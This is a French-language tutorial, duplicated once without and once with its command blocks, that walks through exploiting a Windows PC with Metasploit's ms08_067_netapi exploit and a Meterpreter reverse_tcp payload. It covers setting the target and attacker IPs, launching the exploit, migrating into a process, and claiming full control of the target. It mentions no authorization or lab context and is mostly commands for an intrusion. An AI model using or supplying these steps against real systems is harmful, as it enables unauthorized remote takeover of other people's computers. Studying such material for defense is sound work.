Metasploit reverse_tcp
Exemple avec l'exploit ms08_067_netapi
Ici nous allons utiliser le payload reverse_tcp en utilisant l'exploit ms08_067_netapi
Vous pouvez voir ici les détails de cet exploit et les systèmes faillibles à celui-ci.
Veillez à ce que Metasploit soit à jour:
I- Lancement de la console Metasploit.
II- Choix de l'Exploit
Pour trouver l'exploit qui vous convient vous devez aller vous renseigner ici
Après avoir trouver l'exploit adéquat vous pouvez aller le chercher dans Metasploit avec la commande:
<nomExploit>:à remplacer par l'exploit que vous recherchez.
Ou vous pouvez aussi rentrer directement l'exploit si vous connaissez son nom:
<nomExploit>:à remplacer par l'exploit que vous souhaitez.
Ici nous allons utiliser l'exploit ms08_067_netapi.
Donc nous entrons ceci:
III- Choix du Payload
Pour voir la liste de tous les payloads compatibles avec l'exploit choisi nous entrons la commande:
Dans ce tutoriel nous allons utiliser le payload "reverse_tcp", mais rien ne nous empêche d'en choisir un autre à votre convenance.
Avec la commande:
<NomDuPayload>: à remplacer par le nom du Payload que vous avez choisi.
Nous entrons donc la commande:
IV-Configuration du Payload
Pour voir les différentes options du payload, entrez:
Ici nous allons configurer "RHOST" et "LHOST" du Payload "reverse_tcp".
Pour configurer une option il faut utiliser cette commande:
Dans notre exemple, comme ceci:
<IpCible>: à remplacer par l'adresse IP du PC-Cible de l'attaque.
<VotreIp>: à remplacer par votre adresse IP.
V-Exécution de l'exploit
Pour lancer l'attaque, entrez la commande:
VI- Migration du Payload dans un processus.
Tout d'abord nous allons lister les processus actifs du PC-Cible:
Choissisez alors un processus grâce à son PID (code composé de chiffres placés avant le nom du processus).
Avec la commande
<PIDduProcessus>: à remplacer par le PID du processus de votre choix.
Par exemple:
VII-Exploitation du PC-Cible
Désormais vous avez un contrôle total sur votre PC-Cible.
Vous pouvez voir l'étentue des possibilités de Meterpreter avec la commande:
Merci d'avoir lu mon tutoriel.
Exemple avec l'exploit ms08_067_netapi
Ici nous allons utiliser le payload reverse_tcp en utilisant l'exploit ms08_067_netapi
Vous pouvez voir ici les détails de cet exploit et les systèmes faillibles à celui-ci.
Veillez à ce que Metasploit soit à jour:
Code:
msfupdate
I- Lancement de la console Metasploit.
Code:
msfconsole
II- Choix de l'Exploit
Pour trouver l'exploit qui vous convient vous devez aller vous renseigner ici
Après avoir trouver l'exploit adéquat vous pouvez aller le chercher dans Metasploit avec la commande:
Code:
search <nomExploit>
Ou vous pouvez aussi rentrer directement l'exploit si vous connaissez son nom:
Code:
use <nomExploit>
Ici nous allons utiliser l'exploit ms08_067_netapi.
Donc nous entrons ceci:
Code:
use exploit/windows/smb/ms08_067_netapi
III- Choix du Payload
Pour voir la liste de tous les payloads compatibles avec l'exploit choisi nous entrons la commande:
Code:
show payload
Avec la commande:
Code:
set payload <NomDuPayload>
Nous entrons donc la commande:
Code:
set payload windows/meterpreter/reverse_tcp
IV-Configuration du Payload
Pour voir les différentes options du payload, entrez:
Code:
show options
Pour configurer une option il faut utiliser cette commande:
Code:
set <options> <attribut>
Code:
set RHOST <IpCible>
Code:
set LHOST <VotreIp>
<VotreIp>: à remplacer par votre adresse IP.
V-Exécution de l'exploit
Pour lancer l'attaque, entrez la commande:
Code:
exploit
VI- Migration du Payload dans un processus.
Tout d'abord nous allons lister les processus actifs du PC-Cible:
Code:
ps
Avec la commande
Code:
migrate <PIDduProcessus>
Par exemple:
Code:
migrate 1184
VII-Exploitation du PC-Cible
Désormais vous avez un contrôle total sur votre PC-Cible.
Vous pouvez voir l'étentue des possibilités de Meterpreter avec la commande:
Code:
help
Merci d'avoir lu mon tutoriel.